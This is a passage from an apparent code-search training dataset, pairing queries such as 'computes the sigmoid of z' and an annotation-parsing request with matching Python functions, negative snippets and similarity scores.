pi(self,sigma,y0=0.5):\n y = y0\n for k in range(len(sigma)-1,-1,-1):\n if sigma[k]==0:\n y = self.if0(y)\n else:\n y = self.if1(y)\n return y" ]
[ "0.5753122", "0.56378067", "0.55967945", "0.55486226", "0.5391032", "0.53572434", "0.5309457", "0.52709997", "0.5266623", "0.5236764", "0.5235034", "0.52270055", "0.520521", "0.51976097", "0.5173026", "0.51659435", "0.5153408", "0.51311153", "0.51155776", "0.51090014", "0.5108218", "0.5106356", "0.50945437", "0.5075923", "0.50653666", "0.50465643", "0.5035498", "0.50311834", "0.50284386", "0.50258243", "0.5021636", "0.5017125", "0.5017125", "0.5015763", "0.500452", "0.50027764", "0.49964654", "0.4983807", "0.49687645", "0.49645397", "0.4951933", "0.49319655", "0.49300805", "0.4927638", "0.49274918", "0.4925793", "0.49157247", "0.49030796", "0.49004295", "0.4898749", "0.4898739", "0.48968396", "0.48937637", "0.48887685", "0.48841965", "0.48789224", "0.48668483", "0.48634315", "0.4862663", "0.48606664", "0.48597386", "0.4858111", "0.48533082", "0.48491177", "0.48471898", "0.48402804", "0.4838697", "0.4836155", "0.48324937", "0.48249272", "0.4822698", "0.48163867", "0.48143402", "0.48137337", "0.48108417", "0.4808711", "0.48043603", "0.48022544", "0.4797836", "0.47926977", "0.47921908", "0.47896084", "0.4788835", "0.4788759", "0.47808078", "0.47775972", "0.47770208", "0.47763804", "0.47759593", "0.47751212", "0.47728908", "0.47678256", "0.47646505", "0.47643724", "0.47641152", "0.47597", "0.4755014", "0.4751454", "0.47505307", "0.47497302" ]
0.54940647
4
computes the sigmoid of z z z can be a matrix, vector or scalar sigmoid
def sigmoid(z): g = np.zeros(z.shape) # ====================== YOUR CODE HERE ====================== # Instructions: Compute the sigmoid of each value of z (z can be a matrix, # vector or scalar). return 1/(1+np.exp(-z))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sigmoid(z):\r\n \r\n return vSigmoid(z);", "def sigmoid(z): \n return 1/(1 + np.e**(-z))", "def sigmoid(z):\r\n \r\n return 1.0 / (1.0+np.exp(-z))", "def sigmoid(z):\n\treturn 1.0/(1.0+np.exp(-z))", "def sigmoid(z):\n return 1 / (1 + np.exp(-1 * z))", "def sigmoid(z):\n\n s = 1/(1+ np.exp(-z));\n return s;", "def sigmoid(z):\n return 1.0 / (1 + np.exp(-z))", "def sigmoid(z):\n return 1 / (1 + np.exp(-z))", "def sigmoid(z):\n return 1/(1 + numpy.exp(z))", "def sigmoid(z):\n\n\ts = 1 / (1 + np.exp(-z)) #definition of the sigmoid function\n\treturn s", "def sigmoid(z):\n return 1/(1+np.exp(-z))", "def sigmoid(z):\n\n S = (1 / (1 + np.exp(-z)))\n return S", "def sigmoid(z):\n return 1 / (1 + (np.exp(-z)))", "def sigmoid(z):\n\n s = 1/(1+ np.exp(-z))\n \n return s", "def sigmoid(z):\n s = 1./(1. + np.exp(-z))\n\n return s", "def sigmoid(z):\n s = 1.0 / (1+np.exp(-z))\n return s", "def sigmoid(z):\n # print \"sigmoid input:\", z\n return 1.0 / (1.0 + math.exp(- z))\n # return math.tanh(z)", "def sigmoid(self, z):\n return 1 / (1 + np.exp(-z))", "def sigmoid(z):\n return 1 / (1 + e ** -z)", "def sigmoid(z):\n g = 1/(1 + np.exp(-z))\n return g", "def sigmoid(self, z):\n\n s = 1 / (1 + np.exp(-z))\n\n return s", "def _sigmoid(self, z):\n \n return np.power(1. + np.exp(-z), -1)", "def sigmoid(z):\n g = (1 + np.exp(-z))**-1\n return g", "def sigmoid(z):\n \n return 1 / (1 + np.exp(-z))#your code here", "def sigmoid_function(z):\n\n return 1 / (1 + math.exp(-z))", "def __sigmoid(z, derivative=False):\n if derivative:\n return z * (1 - z)\n else:\n return 1 / (1 + np.exp(-z))", "def sigmoid(Z):\n\n A = 1 / (1 + np.exp(-Z))\n\n return A", "def sigmoid(z):\n\n ### START CODE HERE ### (≈ 1 line of code)\n s = 1 / (1 + np.exp(-z))\n ### END CODE HERE ###\n\n return s", "def sigmoid_activation_function(z):\n val = 1 / (1 + np.exp(-z))\n return val", "def diff_sigmoid(z):\r\n diff_z = np.multiply(z, (1.0 - z))\r\n return diff_z\r\n pass", "def deriv_sigmoid(self,z):\n return np.exp(-z) / ( (1 + np.exp(-z)) ** 2 )", "def activation(z):\n # formula for sigmoid\n return 1 / (1 + np.exp(-z))", "def sigmoid(z: float) -> float:\n epsilon = 1e-5\n return min(max(1 / (1 + math.e ** -z), epsilon), 1 - epsilon)", "def sigmoid(Z):\n\n A = 1 / (1 + np.exp(Z))\n\n internal_params = Z\n return A, internal_params", "def sigmoid(x):\n pos_mask = (x >= 0)\n neg_mask = (x < 0)\n z = np.zeros_like(x)\n z[pos_mask] = np.exp(-x[pos_mask])\n z[neg_mask] = np.exp(x[neg_mask])\n top = np.ones_like(x)\n top[neg_mask] = z[neg_mask]\n return top / (1 + z)", "def sigmoid_gradient(z):\n #derivative of sigmoid\n return z * (1 - z)", "def sigmoid(Z):\n A = 1.0 / (1 + np.exp(-Z))\n cache = Z\n return A, cache", "def sigmoid(x):\r\n return 1 / (1 + np.exp(-x))", "def sigmoid(Z):\n\n A = 1 / (1 + np.exp(-Z))\n cache = Z\n\n return A, cache", "def sigmoid(Z):\n\t\n\tA = 1/(1+np.exp(-Z))\n\tcache = Z\n\t\n\treturn A, cache", "def sigmoid(x):\n\treturn 1 / (1 + m.exp(-x))", "def sigmoid(x):\r\n\r\n return 1 / (1 + np.exp(-x))", "def sigmoid_prime(z):\n return sigmoid(z) * (1 - sigmoid(z))\n # return np.log(1+np.exp(z))", "def sigmoid(x):\n return 1 / (1 * np.exp(-x))", "def sigmoid_prime(z):\r\n return sigmoid(z)*(1-sigmoid(z))", "def sigmoid_prime(z):\r\n return sigmoid(z)*(1-sigmoid(z))", "def sigmoid_prime(z):\r\n return sigmoid(z)*(1-sigmoid(z))", "def sigmoid(Z):\n\n A = 1.0/(1.0+np.exp(-Z))\n cache = Z\n\n return A, cache", "def sigmoid(x):\n return 1 / (1 + np.exp(-x))", "def sigmoid(x):\n return 1 / (1 + np.exp(-x))", "def sigmoid(x):\n return 1 / (1 + np.exp(-x))", "def sigmoid(x):\n return 1 / (1 + np.exp(-x))", "def sigmoid(x):\n return 1 / (1 + np.exp(-x))", "def sigmoid(x):\n return 1 / (1 + np.exp(-x))", "def sigmoid_prime(self, z):\n return self.sigmoid(z)*(1-self.sigmoid(z))", "def sigmoid(x):\n return 1 / (1 + exp(-x))", "def sigmoid(x):\n return 1 / (1 + exp(-x))", "def sigmoid(x, exponent):\n \n return 1/(1+np.exp(-exponent*x))-0.5", "def sigmoid(x):\n return 1. / (1. + np.exp(-x))", "def sigmoid_prime(z): \r\n #计算 σ函数的导数 \r\n return 1.716*(1-np.tanh(2/3*z)**2)*2/3", "def sigmoid_prime(z):\r\n return sigmoid(z) * (1 - sigmoid(z))", "def sigmoid(x):\n\n s = 1 / (1 + np.exp(-x))\n\n return s", "def sigmoid(X):\n if isinstance(X,(list,tuple)):\n X=np.array(X)\n return 1/(1+np.exp(-X))\n #return np.exp(X)/(1+np.exp(X))", "def sigmoid(x):\n return 1/(1+np.exp(-1*x))", "def sigmoid_prime(z):\n return sigmoid(z)*(1-sigmoid(z))", "def sigmoid_prime(z):\n return sigmoid(z)*(1-sigmoid(z))", "def sigmoid_prime(z):\n return sigmoid(z)*(1-sigmoid(z))", "def sigmoid(x):\n return 1.0 / (1.0 + np.exp(-x))", "def sigmoid(x):\n return 1.0/(1 + np.exp(-x))", "def get_sigmoid(arg):\n\n if arg >= 0:\n z = np.exp(-arg)\n return 1. / (1. + z)\n else:\n z = np.exp(arg)\n return z / (1 + z)", "def sigmoid(X):\n return 1 / (1 + np.exp(-X))", "def sigmoid(X):\n return 1 / (1 + np.exp(-X))", "def sigmoid(x):\n return 1 / (1 - (power(e,-x)))", "def sigmoid(x):\n s = 1 / (1 + np.exp(-x))\n return s", "def sigmoid_prime(z):\n\treturn sigmoid(z)*(1-sigmoid(z))", "def sigmoid_derivative(z):\n s = 1./(1. + np.exp(-z))\n ds = s * (1 - s)\n return ds", "def sigmoid_with_binary_xentropy(z):\n\treturn sigmoid(z)", "def sigmoid_prime(z):\n return sigmoid(z) * (1 - sigmoid(z))", "def sigmoid_prime(z):\n return sigmoid(z) * (1 - sigmoid(z))", "def sigmoid_prime(z):\n return sigmoid(z) * (1 - sigmoid(z))", "def sigmoid_prime(z: float) -> float:\n return Math.sigmoid(z) * (1 - Math.sigmoid(z))", "def sigmoid(x: np.ndarray \n ) -> np.ndarray:\n return 1/(1+np.exp(-x))", "def _sigmoid(x):\n return 1 / (1 + np.exp(-x))", "def sigmoid(x):\n return 1 / (1 + math.exp(-x))", "def sigmoid(x):\n\n return 1 / (1 + math.exp(-x))", "def sigmoid(x):\n\n return 1 / (1 + math.exp(-x))", "def sigmoid(x):\n return 1.0/(1.0+exp(-x))", "def sigmoid(x):\r\n #pred_x = (np.exp(x) - np.exp(-x)) / (np.exp(x) + np.exp(-x))\r\n pred_x = 1.0 / (1.0 + np.exp(-x))\r\n return pred_x\r\n pass", "def sigmoid(x):\n return 1 / (1 + math.exp(-x))", "def sigmoid_prime(z):\n return cp.exp(-z) / ((1 + cp.exp(-z)) ** 2)", "def sigmoid_prime(z):\n sig_z = sigmoid(z)\n return sig_z * (1 - sig_z)", "def sigmoid(t):\n return np.exp(t)/(1+np.exp(t))", "def sigmoid_grad(z):\n return Sigmoid(z) * (1 - Sigmoid(z))", "def sigmoid_backward(a, z, g_z):\r\n exp_a = np.multiply(z, 1 - z)\r\n g_a = g_z * exp_a\r\n return g_a", "def der_sigmoid(y):\n return y * (1 - y)", "def sigmoid(t):\n return 1 / (1 + np.exp(-t))", "def sigmoid(x):\n return 1/(1 + math.exp(-x))", "def sigmoid(t):\n\n return 1.0 / (1.0 + np.exp(-t))", "def sigmoid(X):\n g = 1/(1 + np.exp(-X))\n return g", "def sigmoid(inX):\n if inX < 0:\n return 1 - 1 / (1 + exp(inX))\n else:\n return 1 / (1 + exp(-inX))" ]
[ "0.9156451", "0.89855045", "0.89530945", "0.88890535", "0.88774705", "0.8873134", "0.88591874", "0.88549364", "0.8827887", "0.88264954", "0.88236195", "0.8823586", "0.8804889", "0.8797912", "0.87720233", "0.8767488", "0.87623954", "0.87474865", "0.8720549", "0.8660843", "0.8660553", "0.8646597", "0.86425465", "0.85791135", "0.8547536", "0.84156793", "0.8364841", "0.8364031", "0.8331306", "0.83233917", "0.81467474", "0.8094835", "0.80600744", "0.80584246", "0.7824947", "0.778113", "0.7775008", "0.77450264", "0.7741867", "0.773603", "0.77322507", "0.77202934", "0.7709538", "0.76926583", "0.7691008", "0.7691008", "0.7691008", "0.76905644", "0.7671614", "0.7671614", "0.7671614", "0.7671614", "0.7671614", "0.7671614", "0.7654227", "0.7642032", "0.7642032", "0.7641056", "0.76231295", "0.7622387", "0.7618978", "0.7617016", "0.7615131", "0.76121175", "0.7611026", "0.7611026", "0.7611026", "0.7607467", "0.7603841", "0.7598353", "0.7596374", "0.7596374", "0.7580689", "0.7574388", "0.75678", "0.75439155", "0.7535291", "0.7534926", "0.7534926", "0.7534926", "0.75125325", "0.75002205", "0.7498492", "0.7484616", "0.748263", "0.748263", "0.7465236", "0.7457824", "0.7457119", "0.74357015", "0.7435615", "0.7429054", "0.7421606", "0.7420989", "0.7418978", "0.7413467", "0.74016374", "0.73732626", "0.73730993", "0.7367653" ]
0.8674715
19
Parse vistrone image and annotation file
def parse_anno(self, img_path, anno_path) -> dict: anno_obj = dict() img = cv2.imread(img_path) if len(img.shape) == 3: h, w, d = img.shape[:3] anno_obj['size'] = (w, h, d) else: h, w = img.shape[:2] anno_obj['size'] = (w, h, 1) anno_array = np.loadtxt(anno_path, dtype=np.str, delimiter=',') objects = list() if len(anno_array.shape) == 1: # Just one annotation object obj = self.create_anno(anno_array) if obj: objects.append(obj) else: for anno_line in anno_array: obj = self.create_anno(anno_line) if obj: objects.append(obj) if len(objects) == 0: return dict() anno_obj['objects'] = objects return anno_obj
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def unpack_annotation(path):\n buffer = []\n with open(path, 'r') as file:\n lines = file.read()\n\n lines = lines.splitlines()\n for line in lines:\n if not line.startswith('#') and line:\n buffer.append(line)\n\n # Filename to match annotation with photo\n filename = ''\n for line in buffer:\n if 'Image filename' in line:\n filename = line.replace(' ', '').split(':')[1]\n\n # How many person-like objects in photo\n how_many = 0\n for line in buffer:\n if 'Objects with ground truth' in line:\n how_many = int((line.replace(' ', '').split(':')[1][0]))\n break\n\n person_id = []\n for i in range(how_many):\n person_id.append(f'{i+1} \"PASperson\"')\n\n # Centers of objects\n centers = []\n which_one = 0\n for line in buffer:\n if which_one == how_many:\n break\n if person_id[which_one] + ' (X, Y)' in line:\n buf = line.replace(\" \", \"\").split(':')[1]\n buf = buf.replace('(', \"\").replace(')', '').split(',')\n centers.append((int(buf[0]), int(buf[1])))\n which_one += 1\n\n # Bounding boxes of objects\n boxes = []\n which_one = 0\n for line in buffer:\n if which_one == how_many:\n break\n if person_id[which_one] + ' (Xmin, Ymin)' in line:\n buf = line.replace(\" \", \"\").split(':')[1]\n buf = buf.replace('(', \"\").replace(')', '').split('-')\n buf0 = buf[0].split(',')\n buf1 = buf[1].split(',')\n boxes.append((int(buf0[0]), int(buf0[1]), int(buf1[0]), int(buf1[1])))\n which_one += 1\n\n return filename, how_many, centers, boxes", "def parse_rec(json_dataset, index):\n info = voc_info(json_dataset)\n data_path = info['data_path']\n image_file = os.path.join(data_path, 'images', index + '.jpg')\n assert os.path.exists(image_file), 'Path does not exist: {}'.format(image_file)\n\n height, width = cv2.imread(image_file).shape[:2]\n annopath = os.path.join(data_path, 'annotations', '{:s}.txt')\n filename = annopath.format(index)\n rotate = 0\n objects = []\n with open(filename) as f:\n line = f.readline()\n while line:\n parts = line.split()\n if parts[0] == 'rotate':\n rotate = int(parts[1])\n assert rotate == 0\n else:\n obj_struct = {'name': parts[0]}\n x1 = min(max(int(parts[1]), 0), width - 1)\n y1 = min(max(int(parts[2]), 0), height - 1)\n x2 = min(max(int(parts[3]), 0), width - 1)\n y2 = min(max(int(parts[4]), 0), height - 1)\n obj_struct['bbox'] = [x1, y1, x2, y2]\n obj_struct['truncated'] = int(parts[5])\n obj_struct['difficult'] = 0\n objects.append(obj_struct)\n line = f.readline()\n\n return objects", "def extract_data(filename: str, directory: str) -> Dict:\n with open(filename) as f:\n lines = f.readlines()\n\n # Split data by :\n annotations = [line.replace(\" \", \"\").split(\":\") for line in lines]\n\n # Split data by ;\n for annotation in annotations:\n annotation[1] = annotation[1].split(\";\")\n\n # Loop for saving metadata into dictionary\n annot_dict = dict()\n for annotation in annotations:\n img = annotation[0]\n bbox_metadata = annotation[1]\n bbox = list()\n \n # Path to images\n img_path = os.path.join(directory, img)\n im = Image.open(img_path)\n width, height = im.size\n\n # Iterate over each bounding box\n for annot in bbox_metadata:\n \n if \"MISC_SIGNS\" == annot:\n signStatus = 'N/A'\n signTypes = \"MISC_SIGNS\"\n signPurpose = 'N/A'\n\n signBB = (-1, -1, -1, -1)\n signC = (-1, -1)\n signSize = 0\n aspectRatio = 0\n\n bbox.append({\"signStatus\": signStatus, \n \"signTypes\": signTypes, \n \"signPurpose\": signPurpose, \n \"signBB\": signBB, \n \"signC\": signC, \n \"signSize\": signSize, \n \"aspectRatio\": aspectRatio})\n elif \"\\n\" in annot:\n pass\n else:\n data = annot.split(\",\")\n \n signStatus = data[0] # signStatus\n signTypes = data[6] # signTypes\n signPurpose = data[5] # PROHIBITORY, WARNING, OTHER, INFORMATION\n tl_x, tl_y, br_x, br_y = data[3], data[4], data[1], data[2]\n \n if is_valid_decimal(tl_x):\n tl_x = float(tl_x)\n else:\n tl_x = float(cutoff_letter(tl_x))\n\n if is_valid_decimal(tl_y):\n tl_y = float(tl_y)\n else:\n tl_y = float(cutoff_letter(tl_y))\n\n if is_valid_decimal(br_x):\n br_x = float(br_x)\n else:\n br_x = float(cutoff_letter(br_x))\n\n if is_valid_decimal(br_y):\n br_y = float(br_y)\n else:\n br_y = float(cutoff_letter(br_y))\n\n if tl_x < 0:\n tl_x = 0\n elif tl_x > width:\n tl_x = width\n \n if tl_y < 0:\n tl_y = 0\n elif tl_y > height:\n tl_y = height\n \n if br_x < 0:\n br_x = 0\n elif br_x > width:\n br_x = width\n \n if br_y < 0:\n br_y = 0\n elif br_y > height:\n br_y = height\n\n signBB = (tl_x, tl_y, br_x, br_y)\n signC = (br_x + tl_x)/2, (br_y + tl_y)/2\n signSize = (br_x - tl_x) * (br_y - tl_y)\n aspectRatio = (br_x - tl_x) / (br_y - tl_y)\n\n bbox.append({\"signStatus\": signStatus, \n \"signTypes\": signTypes, \n \"signPurpose\": signPurpose, \n \"signBB\": signBB, \n \"signC\": signC, \n \"signSize\": signSize, \n \"aspectRatio\": aspectRatio})\n \n \n annot_dict[img_path] = bbox\n return annot_dict", "def load_annos(self, anno_path):\n\n if os.path.exists(anno_path) is False or os.path.isfile(anno_path) is False or anno_path.endswith('txt') is False:\n print(\"Wrong path: not exist or not a txt file: %s\" % anno_path)\n return None, None\n\n list_file_id, list_anno_id = [], []\n list_x, list_y, list_w, list_h = [], [], [], []\n list_blur, list_expr, list_illum, list_occ, list_pose, list_inval = [], [], [], [], [], []\n anno_id = 0\n\n list_id = []\n list_filename = []\n file_id = 0\n\n num_annos_total = 0\n\n with open(anno_path) as afile:\n line = \"begin\"\n while line != \"\":\n line = afile.readline()\n\n if line.rstrip().endswith('jpg'): # it is a file\n file_name = line.strip()\n list_id.append(file_id)\n list_filename.append(file_name)\n\n num_annos = int(afile.readline().strip())\n\n for i in range(num_annos):\n px, py, pw, ph, blur, expr, illum, inval, occ, pose = afile.readline().strip().split(' ')\n px, py, pw, ph = int(px), int(py), int(pw), int(ph)\n\n if pw == 0 or ph == 0: # ignore invalid faces (0 width or height)\n continue\n\n if pw < 0:\n px = px+pw\n pw = abs(pw)\n if ph < 0:\n py = py+ph\n ph = abs(ph)\n\n list_file_id.append(file_id)\n list_anno_id.append(anno_id)\n list_x.append(px)\n list_y.append(py)\n list_w.append(pw)\n list_h.append(ph)\n list_blur.append(int(blur))\n list_expr.append(int(expr))\n list_illum.append(int(illum))\n list_occ.append(int(occ))\n list_pose.append(int(pose))\n list_inval.append(int(inval))\n anno_id = anno_id + 1\n\n file_id = file_id + 1\n num_annos_total += num_annos\n\n files = {'id': np.array(list_id), 'filename': list_filename }\n annos = {'file_id': np.array(list_file_id), 'anno_id': np.array(list_anno_id), \\\n 'x': np.array(list_x), 'y': np.array(list_y), \\\n 'w': np.array(list_w), 'h': np.array(list_h), \\\n 'blur': np.array(list_blur), 'expression': np.array(list_expr), \\\n 'illumination': np.array(list_illum), 'occlusion': np.array(list_occ), \\\n 'pose': np.array(list_pose), 'invalid': np.array(list_inval) }\n\n assert (len(list_id) == len(list_filename)), \\\n \"file_id and filename lists should have the same length\"\n\n self._num_annos = num_annos_total\n self._num_images = file_id\n\n return files, annos", "def process(self, image):", "def _ann_parser(self):\n pd = tfds.core.lazy_imports.pandas\n with tf.io.gfile.GFile(self.ann_path) as csv_f:\n # read file\n df = pd.read_csv(csv_f, sep=',')\n\n # split\n return {'train_val': df[df['Image Index'].isin(self.train_val_list)],\n 'test': df[df['Image Index'].isin(self.test_list)]\n }", "def process_cvat_xml(xml_file, image_dir, output_dir):\n KNOWN_TAGS = {'box', 'image', 'attribute'}\n #output_dir = os.path.join(output_dir, \"Annotations\")\n os.makedirs(output_dir, exist_ok=True)\n cvat_xml = etree.parse(xml_file)\n\n basename = os.path.splitext( os.path.basename( xml_file ) )[0]\n\n tracks= cvat_xml.findall( './/track' )\n\n if (tracks is not None) and (len(tracks) > 0):\n frames = {}\n\n for track in tracks:\n trackid = int(track.get(\"id\"))\n label = track.get(\"label\")\n boxes = track.findall( './box' )\n for box in boxes:\n frameid = int(box.get('frame'))\n outside = int(box.get('outside'))\n ## occluded and pose are not tested within tracks\n occluded = 0 ## Default if not found\n if 'occluded' in box.attrib: ## this is an attribute of 'box' element\n occluded = int(box.get('occluded'))\n pose = 'Unspecified'\n for attr in box.findall('attribute'):\n if (attr.get('name') == 'type'): ## Used for view type\n pose = attr.text\n #keyframe = int(box.get('keyframe')) #currently unused\n xtl = float(box.get('xtl'))\n ytl = float(box.get('ytl'))\n xbr = float(box.get('xbr'))\n ybr = float(box.get('ybr'))\n \n frame = frames.get( frameid, {} )\n \n if outside == 0:\n frame[ trackid ] = { 'xtl': xtl, 'ytl': ytl, 'xbr': xbr, 'ybr': ybr, 'label': label,\n 'pose': pose, 'truncated': occluded }\n\n frames[ frameid ] = frame\n\n width = int(cvat_xml.find('.//original_size/width').text)\n height = int(cvat_xml.find('.//original_size/height').text)\n\n # Spit out a list of each object for each frame\n for frameid in sorted(frames.keys()):\n print( frameid )\n\n image_name = \"%s_%08d.jpg\" % (basename, frameid) ## KM: Revisit this for tracks. Hardcoded?\n image_path = os.path.join(image_dir, image_name)\n if not os.path.exists(image_path):\n log.warn('{} image cannot be found. Is `{}` image directory correct?'.\n format(image_path, image_dir))\n writer = Writer(image_path, width, height)\n\n frame = frames[frameid]\n\n objids = sorted(frame.keys())\n\n for objid in objids:\n\n box = frame[objid]\n\n label = box.get('label')\n occluded = box.get('occluded')\n pose = box.get('pose')\n xmin = float(box.get('xtl'))\n ymin = float(box.get('ytl'))\n xmax = float(box.get('xbr'))\n ymax = float(box.get('ybr'))\n\n writer.addObject(label, xmin, ymin, xmax, ymax, pose, occluded)\n\n anno_name = os.path.basename(os.path.splitext(image_name)[0] + '.xml')\n anno_dir = os.path.dirname(os.path.join(output_dir, image_name))\n os.makedirs(anno_dir, exist_ok=True)\n writer.save(os.path.join(anno_dir, anno_name))\n\n else:\n for img_tag in cvat_xml.findall('image'):\n ## Discard path component; we expect user to provide path to images directory.\n ## It is probably easier for users to provide full path to images directory\n ## rather than having to figure out how much of the path is embedded in the XML\n ## as a relative or absolute path by CVAT.\n image_name = os.path.basename(img_tag.get('name'))\n width = img_tag.get('width')\n height = img_tag.get('height')\n image_path = os.path.join(image_dir, image_name)\n if not os.path.exists(image_path):\n log.warn('{} image cannot be found. Is `{}` image directory correct?'.\n format(image_path, image_dir))\n writer = Writer(image_path, width, height)\n\n unknown_tags = {x.tag for x in img_tag.iter()}.difference(KNOWN_TAGS)\n if unknown_tags:\n log.warn('Ignoring tags for image {}: {}'.format(image_path, unknown_tags))\n\n for box in img_tag.findall('box'):\n label = box.get('label')\n occluded = 0 ## Default if not found\n if 'occluded' in box.attrib: ## this is an attribute of 'box' element\n occluded = int(box.get('occluded'))\n pose = 'Unspecified' ## Default if not found\n for attr in box.findall('attribute'):\n if (attr.get('name') == 'type'): ## Used for view type\n pose = attr.text\n\n xmin = float(box.get('xtl'))\n ymin = float(box.get('ytl'))\n xmax = float(box.get('xbr'))\n ymax = float(box.get('ybr'))\n\n writer.addObject(label, xmin, ymin, xmax, ymax, pose, occluded)\n\n anno_name = os.path.basename(os.path.splitext(image_name)[0] + '.xml')\n anno_dir = output_dir #os.path.dirname(os.path.join(output_dir, image_name))\n os.makedirs(anno_dir, exist_ok=True)\n #print(\"Writing {} (image: {})\".format(anno_name, image_name))\n writer.save(os.path.join(anno_dir, anno_name))", "def parse_annotation(xml_path):\n\n tree = ET.parse(xml_path)\n root = tree.getroot()\n images = root.findall('image')\n print('[/] total number of image annotations present: {}'.format(len(images)))\n\n image2annotation = {}\n for image in images:\n image_id = image.attrib['id']\n image2annotation[image_id] = []\n\n for box in image.findall('box'):\n label = box.attrib['label']\n # skip if label is not head\n if label != \"head\":\n continue\n\n annotation = {}\n minx, miny = int(float(box.attrib['xtl'])), int(float(box.attrib['ytl']))\n maxx, maxy = int(float(box.attrib['xbr'])), int(float(box.attrib['ybr']))\n\n # parse attributes for the box and create labels accordingly\n safety_helmet, mask = False, False\n for attribute in box.findall('attribute'):\n if attribute.attrib['name'] == 'has_safety_helmet' and attribute.text == 'yes':\n safety_helmet = True\n elif attribute.attrib['name'] == 'mask' and attribute.text == 'yes':\n mask = True\n\n # 3 classes: mask+safety_helmet, safety_helmet and mask\n if safety_helmet and mask:\n class_label = \"mask+safety_helmet\"\n elif safety_helmet:\n class_label = \"safety_helmet\"\n elif mask:\n class_label = \"mask\"\n\n # save bbox coordinates and class label.\n annotation['bbox'] = [minx, miny, maxx, maxy]\n annotation['class'] = class_label\n image2annotation[image_id].append(annotation)\n\n\n return image2annotation", "def read_annotation_yolov5(bbox_path):\n\n # image_paths = get_lists_in_dir(rawImage_dir)\n\n dw = 1./(camera_resolution[0]) # 1 / image width\n dh = 1./(camera_resolution[1]) # 1 / image height\n\n # Read in bbox coordinate information from bbox_information.txt\n dimension_list = []\n with open(bbox_path, 'r') as annotation_file:\n content = annotation_file.read().splitlines()\n\n for n in content:\n # x = int(n.split()[0])+int(n.split()[2])/2\n # y = int(n.split()[1])+int(n.split()[3])/2\n # w = int(n.split()[2])\n # h = int(n.split()[3])\n #\n # x = x*dw\n # w = w*dw\n # y = y*dh\n # h = h*dh\n\n bb = n.split()\n w = int(bb[2])\n h = int(bb[3])\n\n start_x = int(bb[0])\n start_y = int(bb[1])\n\n center_x = start_x + w / 2\n center_y = start_y + h / 2\n\n x = center_x * dw\n y = center_y * dh\n w = w * dw\n h = h * dh\n \n dimension_list.append((x, y, w, h))\n\n return dimension_list", "def __init__(self, filepath: str):\n self.filetype: str = filepath[len(filepath) - 3:].upper()\n self.tags = None\n self.locations: [Location] = None\n self.intermediaryImage = None\n self.outlined = None\n if self.filetype == 'TIF':\n print('found tif')\n with TiffFile(filepath) as tif:\n # fileInfo(tif)\n self.tags = metadataGeoTags(tif)\n self.image = tif.asarray()\n elif self.filetype == 'PNG' or self.filetype == 'JPG':\n print('found png')\n self.image = cv2.imread(filepath, cv2.IMREAD_UNCHANGED)\n else:\n print('invalid file type:', self.filetype)", "def parse(outPath):\n # def _parse_id(line):\n # \"\"\"parse out the COCO id from the 'cp ...' line \"\"\"\n # pat = re.compile('(?<=[0-9]{16}_)[0-9]+') # matches numbers preceded by 16 numbers followed by a '_'\n # mat = pat.search(line)\n # assert not mat is None, (\"this line does not contain a COCO image id: {}\" % line )\n\n # s, e = mat.start(), mat.end()\n # return line[s:e], line[e+1:e+5] \n\n def _parse_id(line):\n \"\"\"parse out the new format as in [no_text_has_instances.out]\"\"\"\n ablt_pat = re.compile('(?<=2014_)[0-9]{12}(?=.jpg)')\n orig_pat = re.compile('(?<=[0-9]{16}_)[0-9]+')\n mat = ablt_pat.search(line)\n if mat is None: #original image\n mat = orig_pat.search(line)\n assert not mat is None, (\"this line does not contain a COCO image id: {}\" % line )\n return line[mat.start(): mat.end()], 'orig'\n else: #ablated image\n num = line[mat.start(): mat.end()]\n return str(int(num)), 'ablt'\n\n with open(outPath, 'r') as f:\n print \"Reading out file...\"\n content = f.read()\n \n l = content.split('\\n')\n pattern = re.compile('^cp|^image')\n l = [x for x in l if pattern.search(x)]\n id_lines, cap_lines = l[::2],l[1::2]\n\n d = OrderedDict() #dictionary from COCO-id to (orig_cap, new_cap)\n\n print \"Parsing img ids and captions...\"\n for idx, id_line in enumerate(id_lines):\n cap = cap_lines[idx].split(':')[-1].strip()\n cocoid, cat = _parse_id(id_line)\n if not cocoid in d:\n d[cocoid] = {}\n d[cocoid][cat] = cap\n\n print \"Computing scores...\"\n #compute scores, need to preprocess all ablated captions and original captions\n stoplist = set('for a of the and to in its his her'.split())\n #believe that ordered dict guarantees iteration order!!!\n ablated, original = [ d[k]['ablt'] for k in d.keys()], [ d[k]['orig'] for k in d.keys()]\n ablated, original = pre_process(ablated, ignore=stoplist),pre_process(original, ignore=stoplist)\n scores = map(lambda x: calc_inter_union(*x), zip(ablated, original))\n for idx, k in enumerate(d.keys()):\n d[k]['score'] = scores[idx]\n\n #get ablation method\n l = id_lines[0]\n if 'blackout' in l:\n d['ablation_method'] = 'blackout'\n elif 'median_bg' in l:\n d['ablation_method'] = 'median_bg'\n elif 'gaussian' in l:\n d['ablation_method'] = 'gaussian'\n elif 'median' in l:\n d['ablation_method'] = 'median'\n elif 'destroy' in l:\n d['ablation_method'] = 'destroy'\n\n\n print \"The output ablation method is \\\"%s\\\"\" % d['ablation_method']\n return d", "def process_image(self):\n pass", "def pull_anno(self, index):\n img_path = list(self.annotation.keys())[index]\n return img_path[img_path.rfind(\"/\") + 1 : img_path.rfind(\".\")], self.annotation[img_path]", "def _parse_ann_info(self, img_info, ann_info):\r\n gt_bboxes = []\r\n gt_labels = []\r\n gt_bboxes_ignore = []\r\n gt_masks_ann = []\r\n\r\n for i, ann in enumerate(ann_info):\r\n if ann.get('ignore', False):\r\n continue\r\n x1, y1, w, h = ann['bbox']\r\n if ann['area'] <= 0 or w < 1 or h < 1:\r\n continue\r\n bbox = [x1, y1, x1 + w - 1, y1 + h - 1]\r\n if ann.get('iscrowd', False):\r\n gt_bboxes_ignore.append(bbox)\r\n else:\r\n gt_bboxes.append(bbox)\r\n gt_labels.append(self.cat2label[ann['category_id']])\r\n gt_masks_ann.append(ann['segmentation'])\r\n\r\n if gt_bboxes:\r\n gt_bboxes = np.array(gt_bboxes, dtype=np.float32)\r\n gt_labels = np.array(gt_labels, dtype=np.int64)\r\n else:\r\n gt_bboxes = np.zeros((0, 4), dtype=np.float32)\r\n gt_labels = np.array([], dtype=np.int64)\r\n\r\n if gt_bboxes_ignore:\r\n gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)\r\n else:\r\n gt_bboxes_ignore = np.zeros((0, 4), 